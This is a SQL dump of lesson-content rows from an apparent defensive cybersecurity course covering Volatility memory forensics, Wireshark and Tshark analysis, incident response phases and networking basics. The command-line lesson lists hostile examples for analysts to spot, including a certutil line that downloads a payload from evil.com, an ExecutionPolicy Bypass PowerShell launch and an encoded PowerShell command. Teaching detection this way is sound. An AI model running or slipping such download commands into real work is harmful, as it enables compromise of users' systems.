(1017, 804, '# Process Enumeration\n\nThe most fundamental task in memory forensics is identifying what programs were running when the RAM was captured.\n\n## windows.pslist (The Honest List)\nTo understand what is running, the Windows Kernel maintains a linked list called the **EPROCESS block list** (specifically the `ActiveProcessLinks`). Whenever you open Task Manager, Windows simply walks down this list and displays the results.\n\nThe `windows.pslist` plugin does exactly the same thing. It asks the OS, \"What processes do you think are running?\"\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.pslist`\n*   **Output:** Process Name, Process ID (PID), Parent Process ID (PPID), Threads, Handles, and Creation Time.\n\n**The Problem:** Because `pslist` relies on the linked list maintained by the OS, it is highly susceptible to **Rootkits**. A rootkit can simply digitally unlink its malicious process from the `ActiveProcessLinks` list. To the OS (and Task Manager, and `pslist`), the malware suddenly becomes invisible, even though it is still actively executing in memory.\n\n## windows.psscan (The Skeptical Scanner)\nTo find hidden processes, we use **Memory Carving**. \n\nInstead of trusting the linked list, `windows.psscan` ignores the OS entirely. It methodically scans every single byte of the massive RAM file, looking for the specific byte-signature that signifies the start of an `EPROCESS` data structure.\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.psscan`\n*   **The Power of Carving:** If a rootkit unlinks itself to hide, `psscan` will still find it, because the actual data structure must still exist in RAM for the malware to run.\n*   **Bonus Power:** Because it scans memory raw, `psscan` can even find processes that were recently terminated (closed) but whose data hasn\'t yet been overwritten by new data.\n\n## The Comparison Technique\nHow do you find the hidden rootkit?\nYou run `pslist`. You run `psscan`. Then you compare the outputs. 
\nIf a process shows up in `psscan` but is absent from `pslist`, you have found a process that was deliberately unlinked and hidden. That PID is almost certainly malicious.\n\n## windows.pstree (The Family Tree)\nAttackers often name their malware something innocent, like `svchost.exe`. How do you spot the fake?\n\n`windows.pstree` organizes processes by their Parent-Child relationships. \n*   *Normal:* `services.exe` spawns a dozen `svchost.exe` processes.\n*   *Malicious:* You see `explorer.exe` (the desktop GUI) spawning a `svchost.exe`. Or a `winword.exe` (Microsoft Word) spawning `cmd.exe` or `powershell.exe`. The parent-child relationship instantly gives away the attacker.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1018, 805, '# Network and Command Line Analysis in RAM\n\nAnalyzing processes is only half the battle. We also need to see what the processes were doing—who they were talking to, and how they were launched.\n\n## windows.netscan\nJust because malware is hidden doesn\'t mean it operates in a vacuum. It must communicate with the attacker\'s Command and Control (C2) server. \n\nThe `windows.netscan` plugin scans RAM for network artifact structures (similar to how `psscan` looks for processes). \n\n*   **Syntax:** `python3 vol.py -f image.raw windows.netscan`\n*   **Output:** \n    *   **Protocol:** TCP/UDP\n    *   **Local Address & Port**\n    *   **Foreign Address & Port:** The external IP the machine is talking to.\n    *   **State:** ESTABLISHED, LISTENING, CLOSED, etc.\n    *   **Owner (PID):** The Process ID responsible for the connection.\n*   **Forensic Value:** If you see an unknown IP address communicating over port 443 (HTTPS), you can check the \"Owner PID\". You might discover that a seemingly innocent `notepad.exe` is actively holding open an encrypted tunnel to Russia. That is an immediate indicator of compromise.\n\n## windows.cmdline\nWindows allows you to launch programs with specific arguments (e.g., instead of just double-clicking a script, an attacker runs `powershell.exe -ExecutionPolicy Bypass -File evil.ps1`).\n\nThese arguments might be the only place the attacker\'s true intent is visible. 
Even if the process completes and terminates, the command-line arguments often linger in memory.\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.cmdline`\n*   **Forensic Value:** This plugin prints out the exact command-line string used to launch every process found in memory.\n*   **What to look for:**\n    *   **Encoded Commands:** `powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0...` (Base64 encoded commands are a massive red flag).\n    *   **Suspicious Paths:** `cmd.exe /c start C:\\Users\\Public\\malware.exe`\n    *   **Living off the Land:** Using legitimate Windows tools for malicious purposes (e.g., `certutil.exe -urlcache -split -f http://evil.com/payload.exe`).', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1019, 806, '# Hunting Advanced Malware (Malfind)\n\nIf an attacker is somewhat sophisticated, they won\'t even leave an `evil.exe` running on the system. Instead, they will use **Code Injection**. \n\nThey will take malicious payload code and inject it directly into the memory space of a completely legitimate process, like the real, Microsoft-signed `explorer.exe` (the taskbar). \nIf you check `pslist`, `explorer.exe` looks fine. If you check `netscan`, `explorer.exe` is talking to the internet (which is suspicious, but not definitive proof).\n\nHow do you prove the legitimate process is \"infected\"?\n\n## Memory Protections (VAD - Virtual Address Descriptor)\nTo understand injection, you must understand how Windows protects memory. Windows assigns permissions to blocks of memory using a structure called the Virtual Address Descriptor (VAD).\n*   **PAGE_READONLY:** The program can read this memory, but not change it.\n*   **PAGE_READWRITE (RW):** The program can store variables and data here.\n*   **PAGE_EXECUTE_READ (RX):** The memory contains actual CPU instructions (code) that are allowed to run.\n\n**The Golden Rule:** Data should be `RW`. Code should be `RX`.\nIt is a massive security risk to allow memory to be both writable AND executable at the same time: **PAGE_EXECUTE_READWRITE (RWX)**.\nIf a block of memory is `RWX`, an attacker can write malicious code into it, and then instantly execute it. Modern Windows compiles very few programs with `RWX` permissions.\n\n## windows.malfind\nThe `windows.malfind` plugin is the ultimate malware hunter. \n\nIt ignores the names of processes. It ignores parent-child relationships. 
Instead, it scans the Virtual Address Descriptor (VAD) of every single process, looking for memory regions marked as **PAGE_EXECUTE_READWRITE (RWX)**.\n\nIf it finds an `RWX` section, it then checks if there is an unbacked executable (a program in memory that does not correspond to a physical file on the hard drive).\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.malfind`\n*   **Output:** For every hit, it prints the Process Name, the PID, the starting memory address of the injected code, and a hex dump of the first few bytes of that injected code.\n*   **What to look for in the Hex Dump:** \n    *   `4D 5A` (MZ) - These are the magic bytes that signify a Windows Executable (PE file).\n    *   If you see a legitimate process like `svchost.exe`, and `malfind` highlights a memory region marked `RWX` that starts with `4D 5A`, you have found a reverse shell or beacon fully injected into that process.\n\n## Extracting the Malware\nOnce `malfind` or `pslist` identifies a malicious PID, you can extract the malware out of the RAM image and save it to your forensic workstation for reverse engineering.\n\n*   **windows.pslist --pid <PID> --dump:** Dumps the entire executable of a running process.\n*   **windows.malfind --pid <PID> --dump:** Dumps specifically the hidden, injected code sections identified by the malfind plugin.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1020, 807, '# Introduction to Packet Captures\n\nNetwork Forensics is the capture, recording, and analysis of network events in order to discover the source of security attacks. The foundational artifact of network forensics is the **Packet Capture (PCAP)** file.\n\n## Why Network Forensics?\nMalware can hide on a hard drive using rootkits. Attackers can delete Event Logs. But it is incredibly difficult for an attacker to hide their network traffic from a properly configured network sensor. \n*   *\"Packets don\'t lie.\"* If data left the building, there is a record of it.\n\n## The PCAP Format\nA `.pcap` (or the newer `.pcapng`) file contains a complete, byte-for-byte copy of every network packet that passed a specific point on the network during the capture window.\n\nThis is fundamentally different from **NetFlow logs**. \n*   **NetFlow:** Like a phone bill. It tells you *who* talked to *whom*, *when*, and for *how long* (e.g., IP A talked to IP B on port 443 for 5 minutes). It does *not* contain the conversation.\n*   **PCAP:** Like a recorded phone call. It contains the metadata *and* the actual data payloads (the contents of the downloaded file, the HTTP GET arrays, the DNS queries).\n\n## Capturing Traffic\nTo capture traffic, sensors (often running software like `tcpdump` or `Zeek`) are placed at strategic chokepoints in the network:\n*   **Ingress/Egress points:** The main firewall connecting the corporate network to the Internet.\n*   **Core Switches:** Monitoring internal Lateral Movement (e.g., User VLAN talking to the Server VLAN).\n*   **Endpoint:** Capturing traffic directly on a specific laptop using tools like Wireshark.\n\n**Promiscuous Mode:** Normally, a network card only reads packets addressed specifically to its own MAC address. 
To capture all traffic on a network segment, the network interface card (NIC) must be put into \"Promiscuous Mode,\" telling it to read everything it sees.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1021, 808, '# Wireshark Fundamentals\n\nWireshark is the world\'s foremost network protocol analyzer. It allows you to open PCAP files and view the captured network traffic at a microscopic level.\n\n## The Three-Pane View\nWhen you open a PCAP in Wireshark, the interface is split into three main panels:\n1.  **Packet List (Top):** Shows a chronological list of every captured packet, with basic summary info (Source IP, Destination IP, Protocol, Length).\n2.  **Packet Details (Middle):** Shows the selected packet broken down layer by layer, matching the OSI model (e.g., Ethernet frame -> IPv4 header -> TCP header -> HTTP payload).\n3.  **Packet Bytes (Bottom):** Shows the raw hexadecimal and ASCII representation of exactly what the raw packet looks like in binary.\n\n## Display Filters\nPCAP files can contain millions of packets. To find evil, you must master Display Filters. They allow you to hide the noise and focus only on relevant traffic.\n\n*   **Filter by IP:**\n    *   `ip.addr == 192.168.1.50` (Shows packets where this IP is either the source OR destination)\n    *   `ip.src == 10.0.0.5` (Shows packets originating from this IP)\n*   **Filter by Protocol:**\n    *   `http` (Shows only unencrypted web traffic)\n    *   `dns` (Shows only DNS queries and responses)\n*   **Filter by Port:**\n    *   `tcp.port == 443` (Shows typical HTTPS traffic)\n    *   `udp.port == 53` (Shows typical DNS traffic)\n*   **Combining Filters (Boolean Logic):**\n    *   `ip.src == 192.168.1.100 && tcp.port == 80` (Finds HTTP traffic leaving a specific host)\n    *   `http.request.method == \"POST\"` (Finds data being uploaded/sent to a web server)\n\n## \"Follow TCP Stream\"\nThis is arguably Wireshark\'s most powerful feature for analysts.\n\nA single file download might span 500 individual packets. Trying to read the file chunk by chunk in the \"Packet Bytes\" pane is impossible. 
\n\nBy right-clicking a packet and selecting **Follow -> TCP Stream**, Wireshark automatically reassembles all 500 packets in the correct order, strips away the networking headers, and displays the pure application data (the actual conversation) in a clean, readable text window.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1022, 809, '# Analyzing Protocols: DNS and HTTP\n\nMost malware needs to communicate with the outside world. To blend in, it often uses the same protocols as normal web browsing: DNS and HTTP. \n\n## DNS (Domain Name System)\nBefore malware can connect to `evil.com`, it must ask DNS for the IP address of that domain.\n*   **Port:** UDP 53.\n*   **Forensic Value:** DNS occurs *before* the connection. Because DNS is usually unencrypted, you can see every domain a computer tries to visit.\n*   **Key Indicator:** Look for DGA (Domain Generation Algorithms). If you see a machine making DNS queries for `qbxvzmpklj.com`, `zxywqabcn.net`, etc., it is highly likely infected with malware trying to find its Command and Control server.\n\n## HTTP (Hypertext Transfer Protocol)\nHTTP is the foundation of the web, but it\'s also perfect for malware because it is almost never blocked by firewalls. \n\nWhen analyzing HTTP, look closely at these fields:\n1.  **User-Agent:** This tells the server what browser the client is using (e.g., `Mozilla/5.0 (Windows NT 10.0...)`). \n    *   *Red Flag:* Malware often uses default, hardcoded User-Agents missing typical browser strings, like simply `curl/7.68.0`, `python-requests/2.25.1`, or even unique strings like `Go-http-client/1.1`.\n2.  **URI (Uniform Resource Identifier):** The actual path of the file requested (e.g., `/images/logo.png`).\n    *   *Red Flag:* Extremely long URIs with random characters might indicate data exfiltration encoded in the URL itself.\n3.  **HTTP Status Codes:**\n    *   **200 OK:** The server successfully received and answered the request (The malware successfully downloaded its payload).\n    *   **404 Not Found:** The target file isn\'t there (The C2 server infrastructure might have been taken down).\n\n## Extracting Files from PCAPs\nIf an employee downloads a suspicious executable over HTTP (unencrypted), that entire executable is stored inside the PCAP file. You can extract it.\n\nIn Wireshark:\n1. 
Go to **File -> Export Objects -> HTTP**.\n2. Wireshark will present a list of every file transferred over HTTP during the capture.\n3. Select the file and click \"Save As\" to dump the actual file to your hard drive for malware analysis.', 'markdown', 8, '2026-03-09 22:28:54', '2026-03-09 22:28:54');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1023, 810, '# Tshark & Command Line Analysis\n\nWireshark is great, but its graphical interface crashes when trying to open massive PCAP files (e.g., a 10GB capture from a busy router). \n\nWhen dealing with Big Data, analysts turn to **Tshark**.\n\n## What is Tshark?\nTshark is the command-line version of Wireshark. It uses the exact same parsing engine and the exact same display filters, but it runs entirely in the terminal.\n\nBecause it doesn\'t have to render a GUI, it is incredibly fast and uses vastly less RAM. It is also easily scriptable in Bash.\n\n## Basic Syntax\n*   **Read a PCAP:** `tshark -r capture.pcap`\n*   **Apply a Filter:** `tshark -r capture.pcap -Y \"http.request.method == GET\"` (Notice the capital `-Y` for display filters).\n\n## The Power of Fields (-T fields)\nThe true power of Tshark is its ability to extract only specific pieces of data from a packet, turning a messy PCAP into a clean CSV file that can be fed into Excel, Splunk, or ElasticSearch.\n\nUse `-T fields` to tell Tshark you only want specific data.\nUse `-e <field_name>` to specify exactly what you want.\n\n**Example 1: Extract all DNS queries**\n`tshark -r capture.pcap -Y \"dns.flags.response == 0\" -T fields -e dns.qry.name`\n*This tells Tshark: Read the file, filter for DNS requests (not responses), and print out only the domain name that was queried.*\n\n**Example 2: Create an HTTP forensic timeline**\n`tshark -r capture.pcap -Y http.request -T fields -e frame.time -e ip.src -e http.request.uri -e http.user_agent`\n*This creates a clean log file showing the Time, the Source IP, the requested URL, and the User-Agent for every HTTP request in the entire capture.*\n\n## Combining with Bash\nBecause Tshark outputs text, you can pipe it into standard Linux tools like `grep`, `sort`, and `uniq`.\nIf you want to see the top 5 most frequently visited domains:\n`tshark -r capture.pcap -Y dns -T fields -e dns.qry.name | sort | uniq -c | sort -nr | head -n 5`', 'markdown', 6, 
'2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1024, 811, '# Phase 1 & 2: Preparation and Identification\n\nThe most widely adopted Incident Response framework is the **PICERL** methodology, defined by SANS. It stands for Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.\n\n## 1. Preparation\n*\"You don\'t want your first time figuring out how to block an IP address to be during a ransomware attack at 3:00 AM.\"*\n\nPreparation is everything done *before* an attack happens. It is the most critical phase.\n*   **Creating the Team:** Establishing the Computer Security Incident Response Team (CSIRT). Knowing exactly who to call (external forensics, legal counsel, PR firm).\n*   **Infrastructure Setup:** Deploying Endpoint Detection and Response (EDR) agents, configuring central logging (SIEM), and ensuring network segmentation.\n*   **Playbooks:** Writing step-by-step guides for handling specific incidents (e.g., \"Ransomware Playbook\", \"Phishing Playbook\").\n*   **Tabletop Exercises:** Conducting simulated cyber attack drills with executives and technical teams to practice the response.\n\n## 2. Identification\nIdentification is the process of determining whether an event is actually a security incident, and if so, determining its scope.\n\n*   **Events vs. Incidents:** An *Event* is anything that happens on a network (a user logging in, a firewall blocking a packet). An *Incident* is a violation of security policy (a user logging in *from Russia using stolen credentials*).\n*   **Indicators of Compromise (IoCs):** Analysts use IoCs to identify bad activity. These are technical artifacts like malicious IPs, domains, or file hashes.\n*   **Alert Triage:** SOC analysts review alerts from the SIEM. If an alert is deemed a true positive, the Incident Response process officially begins.\n*   **Scoping:** Answering the crucial question: *\"How bad is it?\"* Did the attacker compromise one laptop, or the entire Active Directory domain controller database? 
You cannot contain an incident if you do not know the full scope.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1025, 812, '# Phase 3: Containment\n\nOnce an incident is identified and scoped, the immediate goal is to stop the bleeding. **Containment** is about preventing the attacker from doing any further damage or spreading to other systems.\n\n## The Containment Dilemma\nThere are two main strategies for containment, and choosing the right one requires executive approval.\n\n1.  **Immediate Containment (Pulling the Plug):**\n    *   *Action:* As soon as a compromised machine is found, it is instantly disconnected from the network.\n    *   *Pros:* Stops the attacker dead in their tracks. Prevents data exfiltration and ransomware encryption.\n    *   *Cons:* Alerts the attacker that you know they are there. If you haven\'t fully scoped the incident, the attacker will immediately activate their dormant \"Plan B\" backdoors on other systems and bury themselves deeper. Furthermore, you lose Volatile Evidence (RAM) if the machine is powered off.\n2.  **Delayed Containment (Monitoring):**\n    *   *Action:* The defenders leave the compromised system online and silently watch the attacker.\n    *   *Pros:* Allows defenders to fully understand the attacker\'s toolkit, discover all their backdoors, and fully scope the incident. Gives time to capture RAM and network packets.\n    *   *Cons:* Highly risky. 
The attacker might suddenly decide to steal sensitive data or deploy ransomware while you are watching them.\n\n## Containment Actions\nIf the decision is made to contain, the actions must be swift and comprehensive:\n*   **Network Segmentation:** Moving infected hosts to an isolated Quarantine VLAN where they cannot talk to the internet or the rest of the corporate network.\n*   **Firewall Blocks:** Blocking the known Command and Control (C2) IP addresses and domains at the perimeter firewall.\n*   **Account Disablement:** Forcing password resets on compromised user accounts and disabling compromised service accounts.\n*   **Endpoint Isolation:** Using EDR tools to logically cut the machine\'s network access, allowing it to *only* communicate with the IR team\'s forensic servers.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1026, 813, '# Phase 4 & 5: Eradication and Recovery\n\nAfter the attacker is contained in a box and can no longer move, you must remove them from the environment and get the business back online safely.\n\n## Phase 4: Eradication\nEradication is the actual removal of the threat.\n\n*   *\"Whack-a-Mole\" is not a strategy.* You cannot just delete the single malware file you found and call it a day. If you missed a persistent backdoor in the registry, the attacker will be back in 5 minutes.\n*   **Complete Removal:** You must delete malware, remove malicious scheduled tasks, delete attacker-created user accounts, and fix the vulnerability that allowed them in the first place (e.g., patching the exploited firewall, or implementing MFA).\n*   **Nuking from Orbit:** Because advanced malware is so good at hiding, standard IR practice is often to skip manual deletion. Instead, the infected machine\'s hard drive is completely wiped, and the OS is reinstalled from a known-good, pristine image. \"When in doubt, wipe it out.\"\n\n## Phase 5: Recovery\nRecovery is the process of putting the systems back into the production environment and ensuring they are clean.\n\n*   **Restoring from Backup:** If a machine was wiped (or encrypted by ransomware), the data must be restored from secure, offline backups.\n*   **Reconnecting:** Slowly and carefully moving the repaired systems out of the Quarantine VLAN and back into the production network.\n*   **Enhanced Monitoring:** The days following recovery are critical. The IR team will place the recovered systems under extreme scrutiny, looking for any signs that the eradication failed and the attacker has returned.\n*   **Business Continuity:** Restoring normal business operations, which might involve bringing email servers back online or reopening customer portals.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1027, 814, '# Phase 6: Lessons Learned\n\nOften skipped but incredibly vital, the \"Lessons Learned\" phase is where the organization improves its defenses based on the failures of the past.\n\n## The Post-Incident Report\nWithin two weeks of closing the incident, the Incident Response team must produce a comprehensive written report.\n*   **The Timeline:** A blow-by-blow, minute-by-minute account of exactly what the attacker did, and exactly how the defense team responded.\n*   **Root Cause Analysis:** Precisely how the attacker gained initial access (The \"Patient Zero\" vector). E.g., *\"Employee Bob Smith clicked a link in a phishing email on Tuesday.\"*\n*   **The Impact:** Exactly what data was stolen, how much money was lost, and the total downtime of the business. (This is usually required for cyber insurance claims and legal/regulatory compliance).\n\n## The Post-Mortem Meeting\nThe IR team holds a meeting with executives and IT managers to evaluate the response with brutal honesty.\n\n*   *What went right?* (e.g., the EDR tool successfully blocked the ransomware from spreading past the initial host).\n*   *What went wrong?* (e.g., it took the SOC 14 hours to notice the alert; the backups for the HR database were corrupted and failed to restore).\n\n## Continuous Improvement\nThe ultimate goal of this phase is actionable change to ensure the same attack never succeeds again.\n*   If the attacker used a stolen password, the business implements mandatory Multi-Factor Authentication (MFA). \n*   If the IR team didn\'t know how to contain the threat quickly, the business rewrites the playbooks and funds more tabletop training exercises.\n*   The output of \"Lessons Learned\" feeds directly back into Phase 1, \"Preparation\", creating a continuous loop of strengthening security.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1028, 815, '# The OSI & TCP/IP Models\n\nTo understand how to secure a network, you must first understand how a network functions. When you type `google.com` into your browser, a complex sequence of events occurs in milliseconds to fetch that webpage.\n\nNetwork communication is broken down into theoretical layers. The two main models used to describe this are the **OSI Model** (7 layers) and the practical **TCP/IP Model** (4 layers).\n\n## The OSI Model (Open Systems Interconnection)\nThis is a conceptual framework used to understand and standardize the functions of a telecommunication system.\n\n1.  **Layer 7: Application** - The layer the user interacts with (HTTP, DNS, SMTP, FTP).\n2.  **Layer 6: Presentation** - Data translation, encryption (SSL/TLS), and compression.\n3.  **Layer 5: Session** - Establishing, maintaining, and terminating \"sessions\" between applications.\n4.  **Layer 4: Transport** - Reliable vs. unreliable delivery. Where TCP and UDP live. Data is packaged into *Segments*. Ports (like port 80 or 443) operate here.\n5.  **Layer 3: Network** - IP Addressing and Routing. How data gets from one network to an entirely different network. Data is packaged into *Packets*. Routers operate here.\n6.  **Layer 2: Data Link** - MAC Addressing. How data moves between devices on the *same* local network. Data is packaged into *Frames*. Switches operate here.\n7.  **Layer 1: Physical** - The actual cables, radio waves (Wi-Fi), fiber optics, and electrical signals representing 1s and 0s.\n\n## The TCP/IP Model\nWhile the OSI model is great for theory, the internet actually runs on the TCP/IP model, which condenses the 7 layers into 4 practical layers:\n\n1.  **Application Layer** (Combines OSI Layers 5, 6, 7): HTTP, DNS, SSH.\n2.  **Transport Layer** (Matches OSI Layer 4): TCP, UDP.\n3.  **Internet Layer** (Matches OSI Layer 3): IPv4, IPv6, ICMP.\n4.  
**Network Access Layer** (Combines OSI Layers 1, 2): Ethernet, Wi-Fi, MAC addresses.\n\n## Encapsulation\nWhen you send an email, the data moves *down* the OSI layers on your computer. \n*   Your email app (L7) passes data to the Transport layer (L4), which adds a TCP header.\n*   It goes down to the Network layer (L3), which adds an IP header (Source and Dest IP).\n*   It goes down to the Data Link layer (L2), which adds a MAC header.\n*   It finally goes out the Physical layer (L1) as electricity across the wire.\n\nWhen the receiving server gets the electrical signals, it reverses the process, moving *up* the layers (De-encapsulation) until the raw email text reaches the Application layer.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1029, 816, '# Transmission Control Protocol vs. User Datagram Protocol\n\nAt Layer 4 (the Transport Layer), the two dominant protocols are TCP and UDP. Understanding the difference is crucial for identifying how network attacks work and how Firewalls are configured.\n\n## TCP (Transmission Control Protocol)\nTCP is reliable, connection-oriented, and stateful. It guarantees that data will arrive, and in the correct order.\n\n*   **The 3-Way Handshake:** Before ANY data is sent, TCP establishes a strict connection.\n    1.  **SYN:** Client says \"I\'d like to talk to you.\"\n    2.  **SYN-ACK:** Server says \"Okay, I acknowledge your request, let\'s talk.\"\n    3.  **ACK:** Client says \"Great, I\'m sending data now.\"\n*   **Reliability:** Once connected, every time a computer sends a segment of data, the receiving computer must reply with an acknowledgment (ACK). If the sender doesn\'t get the ACK (because the packet dropped over Wi-Fi), it will automatically retransmit the data.\n*   **Use Cases:** Web Browsing (HTTP/HTTPS), Email (SMTP), File Transfers (FTP/SMB), SSH. If a single byte is missing from a downloaded executable, the file breaks. TCP ensures every byte arrives.\n\n## UDP (User Datagram Protocol)\nUDP is unreliable, connectionless, and stateless. It just throws data at the destination and hopes it gets there.\n\n*   **No Handshake:** UDP does not establish a connection first. It just starts sending packets immediately.\n*   **No Acknowledgments:** If a packet gets dropped by a router on the internet, it\'s gone forever. UDP does not resend lost data.\n*   **Why use it?** Speed and low overhead. Because there are no handshakes or ACKs, UDP is much faster.\n*   **Use Cases:** Live Video Streaming (Zoom, Twitch), VoIP (Phone calls), DNS queries, Online Gaming. If you drop a single frame in a 60fps video game, it doesn\'t matter, you don\'t want the game to pause to re-download that old frame. 
You just proceed to the next current frame.\n\n## Ports\nBoth TCP and UDP use **Ports** to direct traffic to the right application on a computer. A computer has 1 IP address, but can have up to 65,535 ports open simultaneously. \n*   If traffic arrives at IP 192.168.1.10 on TCP Port 80, the OS hands that data to the Web Server software.\n*   If traffic arrives at TCP Port 22, the OS hands it to the SSH Server software.', 'markdown', 6, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1030, 817, '# Core Protocols & Services\n\nTo detect anomalies, you must know what normal looks like. Attackers constantly abuse these foundational protocols.\n\n## DNS (Domain Name System)\n*   **Port:** UDP 53 (and sometimes TCP 53)\n*   **Function:** The phonebook of the internet. It translates human-readable domain names (`infoseclabs.com`) into machine IP addresses (`104.21.5.12`).\n*   **Security Context:** Attackers use DNS for Command & Control (C2) beacons, data exfiltration (DNS Tunneling), and redirecting traffic via DNS Spoofing.\n\n## DHCP (Dynamic Host Configuration Protocol)\n*   **Port:** UDP 67 (Server) and UDP 68 (Client)\n*   **Function:** Automatically assigns IP addresses, Subnet Masks, and Default Gateways to devices when they join a network.\n*   **Security Context:** Rogue DHCP servers can assign malicious DNS settings to victim computers, executing Man-In-The-Middle attacks almost invisibly.\n\n## ARP (Address Resolution Protocol)\n*   **Layer:** Layer 2 (Data Link) / Layer 3 (Network) boundary.\n*   **Function:** Maps an IP address to a physical MAC address on a local network. If computer A (IP 10.0.0.5) wants to talk to the Router (IP 10.0.0.1) on the same Wi-Fi, it shouts \"Who has 10.0.0.1?\" via ARP. The router replies with its physical MAC address so the switch knows where to send the frame.\n*   **Security Context:** **ARP Spoofing**. An attacker can lie and reply to the ARP request saying *they* are the router. The victim then sends all their traffic to the hacker instead of the real router.\n\n## ICMP (Internet Control Message Protocol)\n*   **Layer:** Layer 3 (Network)\n*   **Function:** Used for network diagnostics and error reporting. It is not used for transferring data between systems. The `ping` and `traceroute` commands use ICMP Echo Requests and Echo Replies.\n*   **Security Context:** Attackers use ICMP for \"Ping Sweeps\" to map out live hosts on a network. 
It can also be abused for ICMP tunneling to bypass firewalls or launch Smurf DDoS attacks.\n\n## HTTP/HTTPS (Hypertext Transfer Protocol)\n*   **Port:** TCP 80 (HTTP) and TCP 443 (HTTPS)\n*   **Function:** Foundation of the World Wide Web. Facilitates downloading web pages, submitting forms (POST), and API communication. HTTPS adds a layer of encryption (TLS/SSL) to secure the data in transit.\n*   **Security Context:** The vast majority of malware C2 traffic hides inside HTTPS, blending in with regular employee web browsing to evade detection by firewalls.', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1031, 818, '# Navigating Wireshark\n\nWireshark is the industry standard for network protocol analysis. It allows you to see what\'s happening on your network at a microscopic level. It is the de facto standard across many commercial and non-profit enterprises, government agencies, and educational institutions.\n\n## The GUI Layout\nWhen you open a packet capture (PCAP) in Wireshark, the interface is divided into three main panes:\n\n1.  **Packet List Pane (Top):** This pane displays a summary of each packet captured. By default, it shows the packet number, time, source IP address, destination IP address, protocol, length, and detailed information. Clicking on a packet in this pane controls what is displayed in the other two panes.\n2.  **Packet Details Pane (Middle):** This pane shows the current packet, broken down layer by layer, closely mirroring the OSI and TCP/IP models. You can expand each layer (e.g., Ethernet II, IPv4, TCP) to see the specific hex values and how Wireshark interprets them.\n3.  **Packet Bytes Pane (Bottom):** This pane displays the raw, uninterpreted data of the selected packet in hexadecimal and ASCII format. When you select a field in the *Details Pane*, the corresponding bytes are highlighted in the *Bytes Pane*.\n\n## Basic Navigation and Sorting\n*   **Time Column:** By default, the Time column shows the seconds since the beginning of the capture. You can change this via `View -> Time Display Format` to show the actual Time of Day (e.g., `14:32:05.123`).\n*   **Sorting:** You can click on the headers in the Packet List pane to sort by Source IP, Destination IP, Protocol, or Length. 
This is useful for quickly finding the largest packets or sorting traffic by protocol.\n*   **Finding Packets:** You can use `Ctrl+F` (or `Cmd+F`) to search for specific strings, hex values, or display filters within the current capture.\n\n## Color Coding\nWireshark uses color-coding to help you quickly identify different types of traffic.\n*   **Green:** Typically, HTTP or routing traffic.\n*   **Light Blue:** UDP traffic (like DNS lookups).\n*   **Dark Blue/Purple:** TCP traffic.\n*   **Black/Red:** Packets with errors, warnings, or bad checksums (e.g., a TCP Retransmission or out-of-order packet).\n\n*Note: You can customize these coloring rules in `View -> Coloring Rules`.*', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1032, 819, '# Mastering Display Filters\n\nPCAP files often contain hundreds of thousands or even millions of packets. Manually scrolling through them is impossible. **Display Filters** are your strongest weapon as an analyst to cut through the noise and find the signal.\n\n*Important:* Do not confuse Display Filters with Capture Filters. Capture filters decide what data gets written to disk. Display filters hide/show data that has already been captured.\n\n## Filter Syntax Basics\nWireshark uses a very specific syntax for filtering.\n\n*   `.==` (Equals): `ip.addr == 192.168.1.100`\n*   `.!=` (Not Equals): `ip.src != 10.0.0.5`\n*   `.>` (Greater Than): `frame.len > 1500`\n\n## IP and Protocol Filtering\n*   **By IP Address:**\n    *   `ip.src == 8.8.8.8` (Shows only packets originating *from* 8.8.8.8)\n    *   `ip.dst == 8.8.8.8` (Shows only packets going *to* 8.8.8.8)\n    *   `ip.addr == 8.8.8.8` (Shows packets where 8.8.8.8 is *either* the source or destination)\n*   **By Protocol:** Just type the protocol name.\n    *   `http`\n    *   `dns`\n    *   `tcp`\n*   **By Port:**\n    *   `tcp.port == 443` (Shows HTTPS traffic)\n    *   `udp.port == 53` (Shows DNS traffic)\n\n## Boolean Operators (Combining Filters)\nTo find highly specific events, you must chain filters together.\n\n*   **AND (`&&`):** Both conditions must be true.\n    *   `ip.src == 192.168.1.50 && tcp.port == 80` (Finds HTTP traffic originating from a specific laptop).\n*   **OR (`||`):** Only one condition needs to be true.\n    *   `tcp.port == 80 || tcp.port == 443` (Shows both HTTP and HTTPS traffic).\n*   **NOT (`!`):** Excludes traffic.\n    *   `ip.addr == 192.168.1.50 && !(dns)` (Shows all traffic for that IP *except* DNS queries).\n\n## Advanced Filtering (Contains and Matches)\n*   **Contains:** Searches for a specific string payload inside the packets.\n    *   `http contains \"password\"` (Searches all unencrypted HTTP packets for the word \"password\").\n*   **Matches:** Uses 
Regular Expressions (Regex) for powerful pattern matching.\n    *   `http.host matches \".(cn|ru)$\"` (Finds HTTP traffic going to Russian or Chinese top-level domains).', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
